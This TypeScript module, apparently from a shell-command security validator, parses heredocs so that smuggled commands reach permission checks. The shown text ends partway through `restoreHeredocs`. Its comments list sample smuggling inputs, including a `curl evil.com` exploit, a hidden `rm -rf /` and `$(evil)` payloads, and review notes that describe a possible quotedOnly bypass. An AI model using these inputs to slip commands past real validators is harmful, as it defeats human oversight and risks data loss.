/ utils / bash / heredoc.ts
heredoc.ts
  1  /**
  2   * Heredoc extraction and restoration utilities.
  3   *
  4   * The shell-quote library parses `<<` as two separate `<` redirect operators,
  5   * which breaks command splitting for heredoc syntax. This module provides
  6   * utilities to extract heredocs before parsing and restore them after.
  7   *
  8   * Supported heredoc variations:
  9   * - <<WORD      - basic heredoc
 10   * - <<'WORD'    - single-quoted delimiter (no variable expansion in content)
 11   * - <<"WORD"    - double-quoted delimiter (with variable expansion)
 12   * - <<-WORD     - dash prefix (strips leading tabs from content)
 13   * - <<-'WORD'   - combined dash and quoted delimiter
 14   *
 15   * Known limitations:
 16   * - Heredocs inside backtick command substitution may not be extracted
 17   * - Very complex multi-heredoc scenarios may not be extracted
 18   *
 19   * When extraction fails, the command passes through unchanged. This is safe
 20   * because the unextracted heredoc will either cause shell-quote parsing to fail
 21   * (falling back to treating the whole command as one unit) or require manual
 22   * approval for each apparent subcommand.
 23   *
 24   * @module
 25   */
 26  
 27  import { randomBytes } from 'crypto'
 28  
 29  const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_' // opening marker of every placeholder
 30  const HEREDOC_PLACEHOLDER_SUFFIX = '__' // closing marker of every placeholder
     // extractHeredocs assembles placeholders as
     // `${PREFIX}${index}_${salt}${SUFFIX}`, where `index` is the heredoc's
     // position among the extracted heredocs and `salt` is a per-call random
     // hex string.
 31  
 32  /**
 33   * Generates a random hex string for placeholder uniqueness.
 34   * This prevents collision when command text literally contains "__HEREDOC_N__".
 35   */
 36  function generatePlaceholderSalt(): string {
 37    // Generate 8 random bytes as hex (16 characters)
 38    return randomBytes(8).toString('hex')
 39  }
 40  
 41  /**
 42   * Regex pattern for matching heredoc start syntax.
 43   *
      * The operator itself is matched as (?<!<)<<(?!<): a `<<` that is neither
      * preceded nor followed by another `<`. A run of three or more `<` (for
      * example the `<<<` here-string operator) therefore never matches.
      *
      * Capture groups of the full pattern:
      *   1 - the optional `-` of `<<-`
      *   2 - the opening quote character of a quoted delimiter
      *   3 - the quoted delimiter word (may start with a backslash)
      *   4 - the unquoted delimiter word (leading backslash NOT included)
      *
 44   * Two alternatives handle quoted vs unquoted delimiters differently:
 45   *
 46   * Alternative 1 (quoted): (['"]) (\\?\w+) \2
 47   *   Captures the opening quote, then the delimiter word (which MAY include a
 48   *   leading backslash since it's literal inside quotes), then the closing quote.
 49   *   In bash, single quotes make EVERYTHING literal including backslashes:
 50   *     <<'\EOF' → delimiter is \EOF (with backslash)
 51   *     <<'EOF'  → delimiter is EOF
 52   *   Double quotes also preserve backslashes before non-special chars:
 53   *     <<"\EOF" → delimiter is \EOF
 54   *
 55   * Alternative 2 (unquoted): \\?(\w+)
 56   *   Optionally consumes a leading backslash (escape), then captures the word.
 57   *   In bash, an unquoted backslash escapes the next character:
 58   *     <<\EOF → delimiter is EOF (backslash consumed as escape)
 59   *     <<EOF  → delimiter is EOF (plain)
 60   *
 61   * SECURITY: The backslash MUST be inside the capture group for quoted
 62   * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
 63   * the capture group unconditionally, causing <<'\EOF' to extract delimiter
 64   * "EOF" while bash uses "\EOF", allowing command smuggling.
 65   *
 66   * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
 67   * a security issue (could hide commands between << and the delimiter).
      *
      * The literal carries no flags, so it is stateless (no lastIndex tracking).
      * extractHeredocs builds its own global copy from `.source` for iteration.
 68   */
 69  const HEREDOC_START_PATTERN =
 70    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
 71    /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
 72  
 73  export type HeredocInfo = {
 74    /**
        * Restorable heredoc text: the operator text (`<<` or `<<-` plus the
        * delimiter token as written) immediately followed by the content, from
        * the newline that precedes it through the closing delimiter line.
        * Same-line text between the operator and that newline is NOT part of it.
        */
 75    fullText: string
 76    /**
        * The delimiter word (without quotes). A leading backslash is kept for
        * quoted delimiters and dropped for unquoted ones.
        */
 77    delimiter: string
 78    /** Start position of the << operator in the original command */
 79    operatorStartIndex: number
 80    /**
        * End position (exclusive) of the operator match in the original command,
        * i.e. just past the delimiter token - content on same line after this is
        * preserved
        */
 81    operatorEndIndex: number
 82    /**
        * Start position of heredoc content in the original command: the index of
        * the newline that ends the command line and precedes the content
        */
 83    contentStartIndex: number
 84    /**
        * End position (exclusive) of heredoc content including the closing
        * delimiter line; the newline after the closing delimiter is not included
        */
 85    contentEndIndex: number
 86  }
 87  
 88  export type HeredocExtractionResult = {
 89    /**
        * The command with heredocs replaced by placeholders. Identical to the
        * input command when nothing was extracted.
        */
 90    processedCommand: string
 91    /**
        * Map of placeholder string to original heredoc info. Empty when nothing
        * was extracted.
        */
 92    heredocs: Map<string, HeredocInfo>
 93  }
 94  
 95  /**
 96   * Extracts heredocs from a command string and replaces them with placeholders.
 97   *
 98   * This allows shell-quote to parse the command without mangling heredoc syntax.
 99   * After parsing, use `restoreHeredocs` to replace placeholders with original content.
100   *
      * Each extracted heredoc's operator is replaced by its placeholder and its
      * body (newline through closing delimiter) is removed; text on the same line
      * after the operator is kept in place. Whenever the function decides not to
      * extract (no `<<`, a pre-validation bail-out, no valid candidate, or several
      * heredocs sharing one command line), it returns the input unchanged with an
      * empty map.
      *
101   * @param command - The shell command string potentially containing heredocs
      * @param options - Optional settings.
      * @param options.quotedOnly - When true, heredocs whose delimiter is neither
      *   quoted nor backslash-escaped are left in place (their bodies stay visible
      *   in `processedCommand`). Their body ranges are still tracked so that
      *   quoted heredoc operators located inside, or whose body overlaps, such a
      *   range are not extracted either.
102   * @returns Object containing the processed command and a map of placeholders to heredoc info
103   *
104   * @example
105   * ```ts
106   * const result = extractHeredocs(`cat <<EOF
107   * hello world
108   * EOF`);
109   * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4e5f60718__" (16-hex-char salt varies per call)
110   * // result.heredocs has the mapping to restore later
111   * ```
112   */
113  export function extractHeredocs(
114    command: string,
115    options?: { quotedOnly?: boolean },
116  ): HeredocExtractionResult {
117    const heredocs = new Map<string, HeredocInfo>()
118  
119    // Quick check: if no << present, skip processing
120    if (!command.includes('<<')) {
121      return { processedCommand: command, heredocs }
122    }
123  
124    // Security: Paranoid pre-validation. Our incremental quote/comment scanner
125    // (see advanceScan below) does simplified parsing that cannot handle all
126    // bash quoting constructs. If the command contains
127    // constructs that could desync our quote tracking, bail out entirely
128    // rather than risk extracting a heredoc with incorrect boundaries.
129    // This is defense-in-depth: each construct below has caused or could
130    // cause a security bypass if we attempt extraction.
131    //
132    // Specifically, we bail if the command contains:
133    // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
134    //    doesn't handle the $ prefix, would misparse the quotes)
135    // 2. Backtick command substitution (backtick nesting has complex parsing
136    //    rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
137    //    make_cmd.c:606, enabling early heredoc closure that our parser
138    //    can't replicate)
139    if (/\$['"]/.test(command)) {
140      return { processedCommand: command, heredocs }
141    }
142    // Check for backticks in the command text before the first <<.
143    // Backtick nesting has complex parsing rules, and backtick acts as
144    // shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
145    // heredoc closure that our parser can't replicate. We only check
146    // before << because backticks in heredoc body content are harmless.
147    const firstHeredocPos = command.indexOf('<<')
148    if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
149      return { processedCommand: command, heredocs }
150    }
151  
152    // Security: Check for arithmetic evaluation context before the first `<<`.
153    // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
154    // heredoc. If we mis-extract it, subsequent lines become "heredoc content"
155    // and are hidden from security validators, while bash executes them as
156    // separate commands. We bail entirely if `((` appears before `<<` without
157    // a matching `))` — we can't reliably distinguish arithmetic `<<` from
158    // heredoc `<<` in that context. Note: $(( is already caught by
159    // validateDangerousPatterns, but bare (( is not.
160    if (firstHeredocPos > 0) {
161      const beforeHeredoc = command.slice(0, firstHeredocPos)
162      // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
163      const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
164      const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
165      if (openArith > closeArith) {
166        return { processedCommand: command, heredocs }
167      }
168    }
169  
170    // Create a global version of the pattern for iteration
171    const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
172  
173    const heredocMatches: HeredocInfo[] = []
174    // Security: When quotedOnly skips an unquoted heredoc, we still need to
175    // track its content range so the nesting filter can reject quoted heredocs
176    // that appear INSIDE the skipped unquoted heredoc's body. Without this,
177    // `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
178    // top-level heredoc, hiding $(evil) from validators — even though in bash,
179    // $(evil) IS executed (unquoted <<EOF expands its body).
180    const skippedHeredocRanges: Array<{
181      contentStartIndex: number
182      contentEndIndex: number
183    }> = []
184    let match: RegExpExecArray | null
185  
186    // Incremental quote/comment scanner state.
187    //
188    // The regex walks forward through the command, and match.index is monotonically
189    // increasing. Previously, isInsideQuotedString and isInsideComment each
190    // re-scanned from position 0 on every match — O(n²) when the heredoc body
191    // contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
192    // heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
193    // calls extractHeredocs multiple times per command.
194    //
195    // Instead, track quote/comment/escape state incrementally and advance from
196    // the last scanned position. This preserves the OLD helpers' exact semantics:
197    //
198    //   Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
199    //   `#` and never skips characters for being "in a comment". Inside single
200    //   quotes, everything is literal. Inside double quotes, backslash escapes
201    //   the next char. An unquoted backslash run of odd length escapes the next
202    //   char.
203    //
204    //   Comment state (was isInsideComment) observes quote state (# inside quotes
205    //   is not a comment) but NOT the reverse. The old helper used a per-call
206    //   `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
207    //   equivalently, any physical `\n` clears comment state — including `\n`
208    //   inside quotes (since lastIndexOf was quote-blind).
209    //
210    // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
211    // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
212    // (where bash treats `#` as part of the word `x#`, NOT a comment) would
213    // report the `<<` as unquoted and EXTRACT it — hiding content from security
214    // validators. The old isInsideQuotedString was comment-blind; we preserve
215    // that. Both old and new over-eagerly treat any unquoted `#` as a comment
216    // (bash requires word-start), but since quote tracking is independent, the
217    // over-eagerness only affects the comment check — causing SKIPS (safe
218    // direction), never extra EXTRACTIONS.
219    let scanPos = 0
220    let scanInSingleQuote = false
221    let scanInDoubleQuote = false
222    let scanInComment = false
223    // Inside "...": true if the previous char was a backslash (next char is escaped).
224    // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
225    // the char at scanPos.
226    let scanDqEscapeNext = false
227    // Unquoted context: length of the consecutive backslash run ending at scanPos-1.
228    // Used to determine if the char at scanPos is escaped (odd run = escaped).
229    let scanPendingBackslashes = 0
230  
       // Consumes command[scanPos, target) — `target` is exclusive — updating the
       // shared scanner state above, then sets scanPos to `target`. Its only call
       // site passes each regex match index, so targets never decrease; a target
       // at or below scanPos scans nothing.
231    const advanceScan = (target: number): void => {
232      for (let i = scanPos; i < target; i++) {
233        const ch = command[i]!
234  
235        // Any physical newline clears comment state. The old isInsideComment
236        // used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
237        // `\n` inside quotes still advanced lineStart. Match that here by
238        // clearing BEFORE the quote branches.
239        if (ch === '\n') scanInComment = false
240  
241        if (scanInSingleQuote) {
242          if (ch === "'") scanInSingleQuote = false
243          continue
244        }
245  
246        if (scanInDoubleQuote) {
247          if (scanDqEscapeNext) {
248            scanDqEscapeNext = false
249            continue
250          }
251          if (ch === '\\') {
252            scanDqEscapeNext = true
253            continue
254          }
255          if (ch === '"') scanInDoubleQuote = false
256          continue
257        }
258  
259        // Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
260        // isInsideQuotedString): we do NOT skip chars for being inside a
261        // comment. Only the `#` detection itself is gated on not-in-comment.
262        if (ch === '\\') {
263          scanPendingBackslashes++
264          continue
265        }
266        const escaped = scanPendingBackslashes % 2 === 1
267        scanPendingBackslashes = 0
268        if (escaped) continue
269  
270        if (ch === "'") scanInSingleQuote = true
271        else if (ch === '"') scanInDoubleQuote = true
272        else if (!scanInComment && ch === '#') scanInComment = true
273      }
274      scanPos = target
275    }
276  
277    while ((match = heredocStartPattern.exec(command)) !== null) {
278      const startIndex = match.index
279  
280      // Advance the incremental scanner to this match's position. After this,
281      // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
282      // state immediately BEFORE startIndex, and scanPendingBackslashes is the
283      // count of unquoted `\` immediately preceding startIndex.
284      advanceScan(startIndex)
285  
286      // Skip if this << is inside a quoted string (not a real heredoc operator).
287      if (scanInSingleQuote || scanInDoubleQuote) {
288        continue
289      }
290  
291      // Security: Skip if this << is inside a comment (after unquoted #).
292      // In bash, `# <<EOF` is a comment — extracting it would hide commands on
293      // subsequent lines as "heredoc content" while bash executes them.
294      if (scanInComment) {
295        continue
296      }
297  
298      // Security: Skip if this << is preceded by an odd number of backslashes.
299      // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
300      // is input redirection. Extracting it would drop same-line commands from
301      // security checks. The scanner tracks the unquoted backslash run ending
302      // immediately before startIndex (scanPendingBackslashes).
303      if (scanPendingBackslashes % 2 === 1) {
304        continue
305      }
306  
307      // Security: Bail if this `<<` falls inside the body of a previously
308      // SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
309      // `<<` inside a heredoc body is just text — it's not a nested heredoc
310      // operator. Extracting it would hide content that bash actually expands.
311      let insideSkipped = false
312      for (const skipped of skippedHeredocRanges) {
313        if (
314          startIndex > skipped.contentStartIndex &&
315          startIndex < skipped.contentEndIndex
316        ) {
317          insideSkipped = true
318          break
319        }
320      }
321      if (insideSkipped) {
322        continue
323      }
324  
325      const fullMatch = match[0]
326      const isDash = match[1] === '-'
327      // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
328      const delimiter = (match[3] || match[4])!
329      const operatorEndIndex = startIndex + fullMatch.length
330  
331      // Security: Two checks to verify our regex captured the full delimiter word.
332      // Any mismatch between our parsed delimiter and bash's actual delimiter
333      // could allow command smuggling past permission checks.
334  
335      // Check 1: If a quote was captured (group 2), verify the closing quote
336      // was actually matched by \2 in the regex (the quoted alternative requires
337      // the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
338      // non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
339      // early, leaving the closing quote unmatched.
340      // Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
341      // should be "EO F" but we'd use "EO". Skip to prevent mismatch.
         // NOTE(review): with the current pattern, group 2 only participates when
         // the quoted alternative matched in full, which includes the closing \2
         // as the last character of the match. For <<"EO F" neither alternative
         // matches, so there is no match at all. This check therefore looks like
         // defense-in-depth that cannot trigger today — confirm before relying on
         // or removing it.
342      const quoteChar = match[2]
343      if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
344        continue
345      }
346  
347      // Security: Determine if the delimiter is quoted ('EOF', "EOF") or
348      // escaped (\EOF). In bash, quoted/escaped delimiters suppress all
349      // expansion in the heredoc body — content is literal text. Unquoted
350      // delimiters (<<EOF) perform full shell expansion: $(), backticks,
351      // and ${} in the body ARE executed. When quotedOnly is set, skip
352      // unquoted heredocs so their bodies remain visible to security
353      // validators (they may contain executable command substitutions).
354      const isEscapedDelimiter = fullMatch.includes('\\')
355      const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
356      // Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
357      // set. Instead, we compute their content range and add them to
358      // skippedHeredocRanges, then skip them AFTER finding the closing
359      // delimiter. This lets the nesting filter correctly reject quoted
360      // "heredocs" that appear inside unquoted heredoc bodies.
361  
362      // Check 2: Verify the next character after our match is a bash word
363      // terminator (metacharacter or end of string). Characters like word chars,
364      // quotes, $, \ mean the bash word extends beyond our match
365      // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
366      // IMPORTANT: Only match bash's actual metacharacters — space (0x20),
367      // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
368      // also matches \r, \f, \v, and Unicode whitespace that bash treats as
369      // regular word characters, not terminators.
370      if (operatorEndIndex < command.length) {
371        const nextChar = command[operatorEndIndex]!
372        if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
             // NOTE(review): an operator rejected here (and likewise by the
             // line-continuation check further down) is NOT added to
             // skippedHeredocRanges. In quotedOnly mode that means an unquoted
             // heredoc such as `cat <<EOF.txt` leaves no tracked body range, so a
             // quoted `<<'SAFE'` on a following line still passes the
             // insideSkipped/overlap checks and its body is extracted. Trace to
             // confirm: `cat <<EOF.txt\n<<'SAFE'\n$(cmd)\nSAFE\nEOF.txt`. Verify
             // whether other validators cover this before relying on quotedOnly.
373          continue
374        }
375      }
376  
377      // In bash, heredoc content starts on the NEXT LINE after the operator.
378      // Any content on the same line after <<EOF (like " && echo done") is part
379      // of the command, not the heredoc content.
380      //
381      // SECURITY: The "same line" must be the LOGICAL command line, not the
382      // first physical newline. Multi-line quoted strings extend the logical
383      // line — bash waits for the quote to close before starting to read the
384      // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
385      // quoted strings, causing the body to start too early.
386      //
387      // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
388      //   - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
389      //   - Bash: waits for `'` to close → logical line is
390      //     `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
391      //   - Our old code: indexOf('\n') finds the quoted newline → body starts
392      //     at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
393      //     NEVER reaches permission checks.
394      //
395      // Fix: scan forward from operatorEndIndex using quote-state tracking,
396      // finding the first newline that's NOT inside a quoted string. Same
397      // quote-tracking semantics as advanceScan (already used to validate
398      // the `<<` operator position above).
399      let firstNewlineOffset = -1
400      {
401        let inSingleQuote = false
402        let inDoubleQuote = false
403        // We start with clean quote state — advanceScan already rejected the
404        // case where the `<<` operator itself is inside a quote.
405        for (let k = operatorEndIndex; k < command.length; k++) {
406          const ch = command[k]
407          if (inSingleQuote) {
408            if (ch === "'") inSingleQuote = false
409            continue
410          }
411          if (inDoubleQuote) {
412            if (ch === '\\') {
413              k++ // skip escaped char inside double quotes
414              continue
415            }
416            if (ch === '"') inDoubleQuote = false
417            continue
418          }
419          // Unquoted context
             // The newline test runs before the escape test on purpose: a
             // backslash-escaped newline still ends this scan, and the
             // trailing-backslash check below then rejects the candidate.
420          if (ch === '\n') {
421            firstNewlineOffset = k - operatorEndIndex
422            break
423          }
424          // Count backslashes for escape detection in unquoted context
425          let backslashCount = 0
426          for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
427            backslashCount++
428          }
429          if (backslashCount % 2 === 1) continue // escaped char
430          if (ch === "'") inSingleQuote = true
431          else if (ch === '"') inDoubleQuote = true
432        }
433        // If we ended while still inside a quote, the logical line never ends —
434        // there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
435      }
436  
437      // If no unquoted newline found, this heredoc has no content - skip it
438      if (firstNewlineOffset === -1) {
439        continue
440      }
441  
442      // Security: Check for backslash-newline continuation at the end of the
443      // same-line content (text between the operator and the newline). In bash,
444      // `\<newline>` joins lines BEFORE heredoc parsing — so:
445      //   cat <<'EOF' && \
446      //   rm -rf /
447      //   content
448      //   EOF
449      // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
450      // then heredoc body = `content`. Our extractor runs BEFORE continuation
451      // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
452      // hiding it from all validators. Bail if same-line content ends with an
453      // odd number of backslashes.
454      const sameLineContent = command.slice(
455        operatorEndIndex,
456        operatorEndIndex + firstNewlineOffset,
457      )
458      let trailingBackslashes = 0
459      for (let j = sameLineContent.length - 1; j >= 0; j--) {
460        if (sameLineContent[j] === '\\') {
461          trailingBackslashes++
462        } else {
463          break
464        }
465      }
466      if (trailingBackslashes % 2 === 1) {
467        // Odd number of trailing backslashes → last one escapes the newline
468        // → this is a line continuation. Our heredoc-before-continuation order
469        // would misparse this. Bail out.
470        continue
471      }
472  
         // contentStartIndex is the index of the newline itself; the body text
         // begins one character later.
473      const contentStartIndex = operatorEndIndex + firstNewlineOffset
         // NOTE(review): the remainder of the command is sliced and split again
         // for every candidate operator that reaches this point, so the cost
         // grows with (number of candidates × remaining length).
474      const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
475      const contentLines = afterNewline.split('\n')
476  
477      // Find the closing delimiter - must be on its own line
478      // Security: Must match bash's exact behavior to prevent parsing discrepancies
479      // that could allow command smuggling past permission checks.
480      let closingLineIndex = -1
481      for (let i = 0; i < contentLines.length; i++) {
482        const line = contentLines[i]!
483  
484        if (isDash) {
485          // <<- strips leading TABS only (not spaces), per POSIX/bash spec.
486          // The line after stripping leading tabs must be exactly the delimiter.
487          const stripped = line.replace(/^\t*/, '')
488          if (stripped === delimiter) {
489            closingLineIndex = i
490            break
491          }
492        } else {
493          // << requires the closing delimiter to be exactly alone on the line
494          // with NO leading or trailing whitespace. This matches bash behavior.
495          if (line === delimiter) {
496            closingLineIndex = i
497            break
498          }
499        }
500  
501        // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
502        // Inside $(), ${}, or backtick substitution, bash closes a heredoc when
503        // a line STARTS with the delimiter and contains the shell_eof_token
504        // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
505        // line matching, so this discrepancy could hide smuggled commands.
506        //
507        // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
508        // >) after the delimiter, which could indicate command syntax from a
509        // parsing discrepancy we haven't identified.
510        //
511        // For <<- heredocs, bash strips leading tabs before this check.
512        const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
513        if (
514          eofCheckLine.length > delimiter.length &&
515          eofCheckLine.startsWith(delimiter)
516        ) {
517          const charAfterDelimiter = eofCheckLine[delimiter.length]!
518          if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
519            // Shell metacharacter or substitution closer after delimiter —
520            // bash may close the heredoc early here. Bail out.
521            closingLineIndex = -1
522            break
523          }
524        }
525      }
526  
527      // Security: If quotedOnly mode is set and this is an unquoted heredoc,
528      // record its content range for nesting checks but do NOT add it to
529      // heredocMatches. This ensures quoted "heredocs" inside its body are
530      // correctly rejected by the insideSkipped check on subsequent iterations.
531      //
532      // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
533      // unquoted heredoc has no closing delimiter, bash still treats everything
534      // to end-of-input as the heredoc body (and expands $() within it). We
535      // must block extraction of any subsequent quoted "heredoc" that falls
536      // inside that unbounded body.
537      if (options?.quotedOnly && !isQuotedOrEscaped) {
538        let skipContentEndIndex: number
539        if (closingLineIndex === -1) {
540          // No closing delimiter — in bash, heredoc body extends to end of
541          // input. Track the entire remaining range as "skipped body".
542          skipContentEndIndex = command.length
543        } else {
544          const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
545          const skipContentLength = skipLinesUpToClosing.join('\n').length
546          skipContentEndIndex = contentStartIndex + 1 + skipContentLength
547        }
548        skippedHeredocRanges.push({
549          contentStartIndex,
550          contentEndIndex: skipContentEndIndex,
551        })
552        continue
553      }
554  
555      // If no closing delimiter found, this is malformed - skip it
556      if (closingLineIndex === -1) {
557        continue
558      }
559  
560      // Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
561      const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
562      const contentLength = linesUpToClosing.join('\n').length
563      const contentEndIndex = contentStartIndex + 1 + contentLength
564  
565      // Security: Bail if this heredoc's content range OVERLAPS with any
566      // previously-skipped heredoc's content range. This catches the case where
567      // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
568      // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
569      // share a line, their bodies appear SEQUENTIALLY (first's body, then
570      // second's). Both compute contentStartIndex from the SAME newline, so the
571      // second's body search walks through the first's body. For:
572      //   cat <<EOF <<'SAFE'
573      //   $(evil_command)
574      //   EOF
575      //   safe body
576      //   SAFE
577      // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
578      // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
579      // <<EOF's expansion) into the placeholder, hiding it from validators.
580      //
581      // The insideSkipped check above doesn't catch this because the quoted
582      // operator's startIndex is on the command line BEFORE contentStart.
583      // The contentStartPositions dedup check below doesn't catch it because the
584      // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
585      let overlapsSkipped = false
586      for (const skipped of skippedHeredocRanges) {
587        // Ranges [a,b) and [c,d) overlap iff a < d && c < b
588        if (
589          contentStartIndex < skipped.contentEndIndex &&
590          skipped.contentStartIndex < contentEndIndex
591        ) {
592          overlapsSkipped = true
593          break
594        }
595      }
596      if (overlapsSkipped) {
597        continue
598      }
599  
600      // Build fullText: operator + newline + content (normalized form for restoration)
601      // This creates a clean heredoc that can be restored correctly
         // Same-line text between operatorEndIndex and contentStartIndex is left
         // out of fullText on purpose; it stays in processedCommand instead.
602      const operatorText = command.slice(startIndex, operatorEndIndex)
603      const contentText = command.slice(contentStartIndex, contentEndIndex)
604      const fullText = operatorText + contentText
605  
606      heredocMatches.push({
607        fullText,
608        delimiter,
609        operatorStartIndex: startIndex,
610        operatorEndIndex,
611        contentStartIndex,
612        contentEndIndex,
613      })
614    }
615  
616    // If no valid heredocs found, return original
617    if (heredocMatches.length === 0) {
618      return { processedCommand: command, heredocs }
619    }
620  
621    // Filter out nested heredocs - any heredoc whose operator starts inside
622    // another heredoc's content range should be excluded.
623    // This prevents corruption when heredoc content contains << patterns.
       // Each candidate is compared against every other candidate in
       // heredocMatches, including ones this filter itself removes.
624    const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
625      // Check if this candidate's operator is inside any other heredoc's content
626      for (const other of all) {
627        if (candidate === other) continue
628        // Check if candidate's operator starts within other's content range
629        if (
630          candidate.operatorStartIndex > other.contentStartIndex &&
631          candidate.operatorStartIndex < other.contentEndIndex
632        ) {
633          // This heredoc is nested inside another - filter it out
634          return false
635        }
636      }
637      return true
638    })
639  
640    // If filtering removed all heredocs, return original
641    if (topLevelHeredocs.length === 0) {
642      return { processedCommand: command, heredocs }
643    }
644  
645    // Check for multiple heredocs sharing the same content start position
646    // (i.e., on the same line). This causes index corruption during replacement
647    // because indices are calculated on the original string but applied to
648    // a progressively modified string. Return without extraction - the fallback
649    // is safe (requires manual approval or fails parsing).
650    const contentStartPositions = new Set(
651      topLevelHeredocs.map(h => h.contentStartIndex),
652    )
653    if (contentStartPositions.size < topLevelHeredocs.length) {
654      return { processedCommand: command, heredocs }
655    }
656  
657    // Sort by content end position descending so we can replace from end to start
658    // (this preserves indices for earlier replacements)
659    topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
660  
661    // Generate a unique salt for this extraction to prevent placeholder collisions
662    // with literal "__HEREDOC_N__" text in commands
663    const salt = generatePlaceholderSalt()
664  
665    let processedCommand = command
666    topLevelHeredocs.forEach((info, index) => {
667      // Use reverse index since we sorted descending
         // (so placeholder 0 belongs to the heredoc with the smallest content end)
668      const placeholderIndex = topLevelHeredocs.length - 1 - index
669      const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
670  
671      heredocs.set(placeholder, info)
672  
673      // Replace heredoc with placeholder while preserving same-line content:
674      // - Keep everything before the operator
675      // - Replace operator with placeholder
676      // - Keep content between operator and heredoc content (e.g., " && echo done")
677      // - Remove the heredoc content (from newline through closing delimiter)
678      // - Keep everything after the closing delimiter
679      processedCommand =
680        processedCommand.slice(0, info.operatorStartIndex) +
681        placeholder +
682        processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
683        processedCommand.slice(info.contentEndIndex)
684    })
685  
686    return { processedCommand, heredocs }
687  }
688  
/**
 * Restores heredoc placeholders back to their original content in a single string.
 * Internal helper used by restoreHeredocs.
 *
 * Every occurrence of each placeholder key found in `text` is replaced by the
 * matching entry's `fullText`, inserted verbatim. Entries are applied in the
 * map's iteration order, each one operating on the result of the previous.
 *
 * @param text - A string that may contain heredoc placeholders
 * @param heredocs - Map of placeholder string to the heredoc it stands for
 * @returns `text` with all known placeholders expanded; unchanged if none occur
 */
function restoreHeredocsInString(
  text: string,
  heredocs: Map<string, HeredocInfo>,
): string {
  let result = text
  for (const [placeholder, info] of heredocs) {
    // Heredoc bodies are shell text and routinely contain `$$`, `$&`, `` $` ``
    // or `$'`. Passing fullText as a replacement *string* to replace/replaceAll
    // would interpret those as replacement patterns (`$$` → `$`, `$&` → the
    // placeholder, ...) and corrupt the restored heredoc. split/join treats
    // both the placeholder and the inserted text literally.
    result = result.split(placeholder).join(info.fullText)
  }
  return result
}
703  
/**
 * Expands heredoc placeholders in each string of an array.
 *
 * When the map is empty there is nothing to restore and the input array is
 * returned as-is (same reference). Otherwise a new array is produced with
 * every element passed through the single-string restore helper.
 *
 * @param parts - Array of strings that may contain heredoc placeholders
 * @param heredocs - The map of placeholders from `extractHeredocs`
 * @returns The original array when `heredocs` is empty, else a new array with
 *   placeholders replaced by original heredoc content
 */
export function restoreHeredocs(
  parts: string[],
  heredocs: Map<string, HeredocInfo>,
): string[] {
  const expand = (segment: string): string =>
